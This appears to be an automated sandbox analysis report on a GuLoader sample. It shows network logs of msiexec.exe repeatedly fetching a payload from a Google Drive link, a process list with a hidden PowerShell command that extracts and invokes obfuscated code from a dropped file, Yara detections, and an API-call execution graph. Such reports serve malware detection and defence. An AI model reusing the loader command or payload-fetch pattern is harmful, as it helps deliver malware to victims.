                                                                                          X-GUploader-UploadID: AFiumC6gl3_UA8eFSPWWCZAShlzvOg-YXSwJuLb61TZIpMvLC88Xz7s-eEiXMohPufwwccyD
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:15 GMT
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-T7ejV4F1ttm7NaobG-Uq4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:18:15 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="DgUcMaJuGAHuiWmt3FH0LA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          66 | 192.168.2.6 | 50052 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:18:16 UTC | 418 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:16 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:16 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-dfMkHgAnGDKrQ4OZ1hBoMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          67 | 192.168.2.6 | 50053 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:18:17 UTC | 460 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:17 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgS5m5j1zfyBJsDI6v8PjNT-XkB0niZTi_aplrudosYZ3DZX4iOBagDuFX6N1xgBXxuNJr8pPTY
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:17 GMT
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-yhm8-TR4BBaZ96TWzFDRQw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:18:17 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="U26slU8asQoekPMP0SMdqQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          68 | 192.168.2.6 | 50054 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:18:18 UTC | 418 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:18 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:18 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-h0WR5mcuLcC4DSF34hPPXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                          69    192.168.2.6    50055    216.58.206.65    443    5692    C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp    Bytes transferred    Direction    Data
                                                                                          2025-01-10 14:18:19 UTC    460    OUT    GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:20 UTC    1851    IN    HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFiumC49efzy5Jc1zUU9JX9-uzePxgCDNw7mjPjHzaytwcAUqt-u-IyH2CLBz47F_relOc1gMv5MMHU
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:19 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy: script-src 'nonce-5JttNT0--xGjnb2pb2WQlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:18:20 UTC    1652    IN
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uM10TKxPVutGvdxYKnj9wA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Target ID:0
                                                                                          Start time:09:16:14
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Users\user\Desktop\You7ynHizy.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\You7ynHizy.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:672'464 bytes
                                                                                          MD5 hash:98E8E7C349CBB65B53681757DC2959AE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:2
                                                                                          Start time:09:16:14
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"powershell.exe" -windowstyle hidden "$Eventyrromaners=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Celestaens.exo';$Uncrumbled=$Eventyrromaners.SubString(54209,3);.$Uncrumbled($Eventyrromaners)"
                                                                                          Imagebase:0x990000
                                                                                          File size:433'152 bytes
                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2532691410.0000000009A59000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:3
                                                                                          Start time:09:16:14
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:8
                                                                                          Start time:09:16:52
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\syswow64\msiexec.exe"
                                                                                          Imagebase:0x130000
                                                                                          File size:59'904 bytes
                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.3375229817.0000000004F19000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                            Execution Graph

                                                                                            Execution Coverage:24.4%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:20.5%
                                                                                            Total number of Nodes:1338
                                                                                            Total number of Limit Nodes:35
3557->3558 3559 40336a 3558->3559 3560 405dff 3558->3560 3559->3374 3560->3558 3560->3559 3561->3456 3562->3458 3563->3462 3565 402e82 3564->3565 3566 402e9a 3564->3566 3567 402e92 3565->3567 3568 402e8b DestroyWindow 3565->3568 3569 402ea2 3566->3569 3570 402eaa GetTickCount 3566->3570 3567->3465 3568->3567 3571 4066ad 2 API calls 3569->3571 3572 402eb8 CreateDialogParamW ShowWindow 3570->3572 3573 402edb 3570->3573 3574 402ea8 3571->3574 3572->3573 3573->3465 3574->3465 3575->3471 3576->3473 3578 403c71 3577->3578 3594 4061de wsprintfW 3578->3594 3580 403ce2 3595 403d16 3580->3595 3582 403a12 3582->3495 3583 403ce7 3583->3582 3584 4062b9 17 API calls 3583->3584 3584->3583 3598 40425a 3585->3598 3587 4053f5 3591 40541c 3587->3591 3601 401389 3587->3601 3588 40425a SendMessageW 3589 40542e CoUninitialize 3588->3589 3589->3527 3591->3588 3592->3491 3593->3497 3594->3580 3596 4062b9 17 API calls 3595->3596 3597 403d24 SetWindowTextW 3596->3597 3597->3583 3599 404272 3598->3599 3600 404263 SendMessageW 3598->3600 3599->3587 3600->3599 3603 401390 3601->3603 3602 4013fe 3602->3587 3603->3602 3604 4013cb MulDiv SendMessageW 3603->3604 3604->3603 3606 403900 3605->3606 3607 4038ca 3606->3607 3608 403905 FreeLibrary GlobalFree 3606->3608 3607->3546 3608->3607 3608->3608 3648 40176f 3649 402c41 17 API calls 3648->3649 3650 401776 3649->3650 3651 401796 3650->3651 3652 40179e 3650->3652 3687 406297 lstrcpynW 3651->3687 3688 406297 lstrcpynW 3652->3688 3655 40179c 3658 40652b 5 API calls 3655->3658 3656 4017a9 3657 405b6c 3 API calls 3656->3657 3659 4017af lstrcatW 3657->3659 3675 4017bb 3658->3675 3659->3655 3660 4065da 2 API calls 3660->3675 3661 405d68 2 API calls 3661->3675 3663 4017cd CompareFileTime 3663->3675 3664 40188d 3665 4052ff 24 API calls 3664->3665 3666 401897 3665->3666 3669 403116 31 API calls 3666->3669 3667 4052ff 24 API calls 3670 401879 3667->3670 3668 406297 lstrcpynW 3668->3675 3671 4018aa 3669->3671 3672 4018be SetFileTime 3671->3672 3674 4018d0 
CloseHandle 3671->3674 3672->3674 3673 4062b9 17 API calls 3673->3675 3674->3670 3676 4018e1 3674->3676 3675->3660 3675->3661 3675->3663 3675->3664 3675->3668 3675->3673 3681 4058fd MessageBoxIndirectW 3675->3681 3685 401864 3675->3685 3686 405d8d GetFileAttributesW CreateFileW 3675->3686 3677 4018e6 3676->3677 3678 4018f9 3676->3678 3679 4062b9 17 API calls 3677->3679 3680 4062b9 17 API calls 3678->3680 3682 4018ee lstrcatW 3679->3682 3683 401901 3680->3683 3681->3675 3682->3683 3684 4058fd MessageBoxIndirectW 3683->3684 3684->3670 3685->3667 3685->3670 3686->3675 3687->3655 3688->3656 4059 4027ef 4060 4027f6 4059->4060 4066 402a70 4059->4066 4061 402c1f 17 API calls 4060->4061 4062 4027fd 4061->4062 4063 40280c SetFilePointer 4062->4063 4064 40281c 4063->4064 4063->4066 4067 4061de wsprintfW 4064->4067 4067->4066 4068 401a72 4069 402c1f 17 API calls 4068->4069 4070 401a7b 4069->4070 4071 402c1f 17 API calls 4070->4071 4072 401a20 4071->4072 3712 401573 3713 401583 ShowWindow 3712->3713 3714 40158c 3712->3714 3713->3714 3715 40159a ShowWindow 3714->3715 3716 402ac5 3714->3716 3715->3716 4073 405273 4074 405283 4073->4074 4075 405297 4073->4075 4077 4052e0 4074->4077 4078 405289 4074->4078 4076 40529f IsWindowVisible 4075->4076 4084 4052b6 4075->4084 4076->4077 4079 4052ac 4076->4079 4080 4052e5 CallWindowProcW 4077->4080 4081 40425a SendMessageW 4078->4081 4086 404bc9 SendMessageW 4079->4086 4082 405293 4080->4082 4081->4082 4084->4080 4091 404c49 4084->4091 4087 404c28 SendMessageW 4086->4087 4088 404bec GetMessagePos ScreenToClient SendMessageW 4086->4088 4089 404c20 4087->4089 4088->4089 4090 404c25 4088->4090 4089->4084 4090->4087 4100 406297 lstrcpynW 4091->4100 4093 404c5c 4101 4061de wsprintfW 4093->4101 4095 404c66 4096 40140b 2 API calls 4095->4096 4097 404c6f 4096->4097 4102 406297 lstrcpynW 4097->4102 4099 404c76 4099->4077 4100->4093 4101->4095 4102->4099 4103 402df3 4104 402e05 SetTimer 4103->4104 4105 402e1e 4103->4105 4104->4105 4106 402e73 
4105->4106 4107 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4105->4107 4107->4106 4108 401cf3 4109 402c1f 17 API calls 4108->4109 4110 401cf9 IsWindow 4109->4110 4111 401a20 4110->4111 4112 4014f5 SetForegroundWindow 4113 402ac5 4112->4113 4114 402576 4115 402c41 17 API calls 4114->4115 4116 40257d 4115->4116 4119 405d8d GetFileAttributesW CreateFileW 4116->4119 4118 402589 4119->4118 4120 401b77 4121 401b84 4120->4121 4122 401bc8 4120->4122 4123 4022e4 4121->4123 4129 401b9b 4121->4129 4124 401bf2 GlobalAlloc 4122->4124 4125 401bcd 4122->4125 4127 4062b9 17 API calls 4123->4127 4126 4062b9 17 API calls 4124->4126 4132 401c0d 4125->4132 4141 406297 lstrcpynW 4125->4141 4126->4132 4128 4022f1 4127->4128 4134 4058fd MessageBoxIndirectW 4128->4134 4139 406297 lstrcpynW 4129->4139 4133 401bdf GlobalFree 4133->4132 4134->4132 4135 401baa 4140 406297 lstrcpynW 4135->4140 4137 401bb9 4142 406297 lstrcpynW 4137->4142 4139->4135 4140->4137 4141->4133 4142->4132 3811 4024f8 3812 402c81 17 API calls 3811->3812 3813 402502 3812->3813 3814 402c1f 17 API calls 3813->3814 3815 40250b 3814->3815 3816 402533 RegEnumValueW 3815->3816 3817 402527 RegEnumKeyW 3815->3817 3820 40288b 3815->3820 3818 40254f RegCloseKey 3816->3818 3819 402548 3816->3819 3817->3818 3818->3820 3819->3818 4143 40167b 4144 402c41 17 API calls 4143->4144 4145 401682 4144->4145 4146 402c41 17 API calls 4145->4146 4147 40168b 4146->4147 4148 402c41 17 API calls 4147->4148 4149 401694 MoveFileW 4148->4149 4150 4016a7 4149->4150 4156 4016a0 4149->4156 4152 4065da 2 API calls 4150->4152 4154 402250 4150->4154 4151 401423 24 API calls 4151->4154 4153 4016b6 4152->4153 4153->4154 4155 40605d 36 API calls 4153->4155 4155->4156 4156->4151 4157 404c7b GetDlgItem GetDlgItem 4158 404ccd 7 API calls 4157->4158 4161 404ee6 4157->4161 4159 404d70 DeleteObject 4158->4159 4160 404d63 SendMessageW 4158->4160 4162 404d79 4159->4162 4160->4159 4176 404bc9 5 API calls 4161->4176 4180 404fca 4161->4180 4189 404f57 
4161->4189 4163 404db0 4162->4163 4165 4062b9 17 API calls 4162->4165 4166 40420e 18 API calls 4163->4166 4164 405076 4169 405080 SendMessageW 4164->4169 4170 405088 4164->4170 4171 404d92 SendMessageW SendMessageW 4165->4171 4167 404dc4 4166->4167 4172 40420e 18 API calls 4167->4172 4168 404ed9 4174 404275 8 API calls 4168->4174 4169->4170 4181 4050a1 4170->4181 4182 40509a ImageList_Destroy 4170->4182 4186 4050b1 4170->4186 4171->4162 4190 404dd2 4172->4190 4173 405023 SendMessageW 4173->4168 4178 405038 SendMessageW 4173->4178 4179 40526c 4174->4179 4175 404fbc SendMessageW 4175->4180 4176->4189 4177 405220 4177->4168 4187 405232 ShowWindow GetDlgItem ShowWindow 4177->4187 4185 40504b 4178->4185 4180->4164 4180->4168 4180->4173 4183 4050aa GlobalFree 4181->4183 4181->4186 4182->4181 4183->4186 4184 404ea7 GetWindowLongW SetWindowLongW 4188 404ec0 4184->4188 4195 40505c SendMessageW 4185->4195 4186->4177 4200 404c49 4 API calls 4186->4200 4204 4050ec 4186->4204 4187->4168 4191 404ec6 ShowWindow 4188->4191 4192 404ede 4188->4192 4189->4175 4189->4180 4190->4184 4194 404e22 SendMessageW 4190->4194 4196 404ea1 4190->4196 4198 404e5e SendMessageW 4190->4198 4199 404e6f SendMessageW 4190->4199 4208 404243 SendMessageW 4191->4208 4209 404243 SendMessageW 4192->4209 4194->4190 4195->4164 4196->4184 4196->4188 4198->4190 4199->4190 4200->4204 4201 4051f6 InvalidateRect 4201->4177 4202 40520c 4201->4202 4210 404b84 4202->4210 4203 40511a SendMessageW 4207 405130 4203->4207 4204->4203 4204->4207 4206 4051a4 SendMessageW SendMessageW 4206->4207 4207->4201 4207->4206 4208->4168 4209->4161 4213 404abb 4210->4213 4212 404b99 4212->4177 4214 404ad4 4213->4214 4215 4062b9 17 API calls 4214->4215 4216 404b38 4215->4216 4217 4062b9 17 API calls 4216->4217 4218 404b43 4217->4218 4219 4062b9 17 API calls 4218->4219 4220 404b59 lstrlenW wsprintfW SetDlgItemTextW 4219->4220 4220->4212 4221 401e7d 4222 402c41 17 API calls 4221->4222 4223 401e83 4222->4223 4224 402c41 17 API calls 
